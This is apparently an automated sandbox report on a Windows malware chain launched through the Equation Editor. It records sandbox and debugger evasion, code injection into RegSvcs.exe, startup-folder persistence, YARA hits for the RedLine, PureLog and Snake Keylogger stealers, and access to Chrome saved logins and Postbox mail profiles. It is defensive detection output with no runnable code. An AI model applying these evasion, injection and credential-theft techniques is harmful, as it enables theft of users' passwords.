Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Roaming\negrett.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Users\user\AppData\Local\directory\name.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

9_2_004019F0

Contains functionality to detect virtual machines (SLDT)

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 8_2_01001199 sldt word ptr [ecx]

8_2_01001199

Contains long sleeps (>= 3 min)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1404	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 8402	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 8861	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 961	Jump to behavior

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Roaming\negrett.exe	API coverage: 6.7 %
Source: C:\Users\user\AppData\Local\directory\name.exe	API coverage: 4.5 %
Source: C:\Users\user\AppData\Local\directory\name.exe	API coverage: 4.4 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1376

Thread sleep time: -240000s >= -30000s

Jump to behavior

Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B7DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	5_2_00B7DBBE
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B4C2A2 FindFirstFileExW,	5_2_00B4C2A2
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B868EE FindFirstFileW,FindClose,	5_2_00B868EE
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B8698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	5_2_00B8698F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0105DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	8_2_0105DBBE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0102C2A2 FindFirstFileExW,	8_2_0102C2A2
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0106698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	8_2_0106698F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_010668EE FindFirstFileW,FindClose,	8_2_010668EE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0105D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_0105D076
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0105D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_0105D3A9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0106979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_0106979D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01069642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_01069642
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01069B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	8_2_01069B2B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01065C97 FindFirstFileW,FindNextFileW,FindClose,	8_2_01065C97
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0139DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	11_2_0139DBBE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0136C2A2 FindFirstFileExW,	11_2_0136C2A2
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	11_2_013A698F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A68EE FindFirstFileW,FindClose,	11_2_013A68EE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0139D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_0139D076
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0139D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_0139D3A9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_013A979D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_013A9642
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	11_2_013A9B2B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A5C97 FindFirstFileW,FindNextFileW,FindClose,	11_2_013A5C97

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

5_2_00B142DE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

API call chain: ExitProcess graph end node

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

9_2_00410C4B

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B8EAA2 BlockInput,

5_2_00B8EAA2

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B42622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

5_2_00B42622

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

9_2_004019F0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

5_2_00B142DE

Contains functionality to read the PEB

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03530715 mov edx, dword ptr fs:[00000030h]	2_2_03530715
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029F40E8 mov eax, dword ptr fs:[00000030h]	5_3_029F40E8
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B34CE8 mov eax, dword ptr fs:[00000030h]	5_2_00B34CE8
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01014CE8 mov eax, dword ptr fs:[00000030h]	8_2_01014CE8
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00193580 mov eax, dword ptr fs:[00000030h]	8_2_00193580
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_001935E0 mov eax, dword ptr fs:[00000030h]	8_2_001935E0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00191ED0 mov eax, dword ptr fs:[00000030h]	8_2_00191ED0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01354CE8 mov eax, dword ptr fs:[00000030h]	11_2_01354CE8
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_005535E0 mov eax, dword ptr fs:[00000030h]	11_2_005535E0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_00553580 mov eax, dword ptr fs:[00000030h]	11_2_00553580
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_00551ED0 mov eax, dword ptr fs:[00000030h]	11_2_00551ED0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Roaming\negrett.exe

5_2_00B70B62

Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B309D5 SetUnhandledExceptionFilter,	5_2_00B309D5
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B42622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00B42622
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B3083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00B3083F
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B30C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00B30C21
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_010109D5 SetUnhandledExceptionFilter,	8_2_010109D5
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01022622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_01022622
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0101083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_0101083F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01010C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_01010C21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0040CE09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0040E61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00416F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004123F1 SetUnhandledExceptionFilter,	9_2_004123F1
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013509D5 SetUnhandledExceptionFilter,	11_2_013509D5
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01362622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_01362622
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0135083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_0135083F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01350C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_01350C21

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\directory\name.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008			Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008			Jump to behavior

Contains functionality to execute programs as a different user

Source: C:\Users\user\AppData\Local\directory\name.exe

8_2_01051201

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B52BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

5_2_00B52BA5

Contains functionality to simulate keystroke presses

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 8_2_0105B226 SendInput,keybd_event,

8_2_0105B226

Contains functionality to simulate mouse events

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B922DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

5_2_00B922DA

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\negrett.exe C:\Users\user\AppData\Roaming\negrett.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe C:\Users\user\AppData\Roaming\negrett.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Roaming\negrett.exe	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior

Source: C:\Users\user\AppData\Roaming\negrett.exe

5_2_00B70B62

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 8_2_01051663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

8_2_01051663

Source: EQNEDT32.EXE, 00000002.00000003.460812242.0000000007ECD000.00000004.00000020.00020000.00000000.sdmp, negrett.exe, 00000005.00000000.460870402.0000000000BD2000.00000002.00000001.01000000.00000004.sdmp, negrett.exe, 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: name.exe	Binary or memory string: Shell_TrayWnd

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_3_029EFA98 cpuid

5_3_029EFA98

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: GetLocaleInfoA,

9_2_00417A20

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B4333F GetSystemTimeAsFileTime,

5_2_00B4333F

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 8_2_0104D27A GetUserNameW,

8_2_0104D27A

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 8_2_0102B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

8_2_0102B952

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

5_2_00B142DE

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 11.2.name.exe.560000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.name.exe.7d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.887505835.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.779270718.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.817043732.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior

OS version to string mapping found (often used in BOTs)

Source: name.exe	Binary or memory string: WIN_81
Source: name.exe	Binary or memory string: WIN_XP
Source: name.exe.5.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 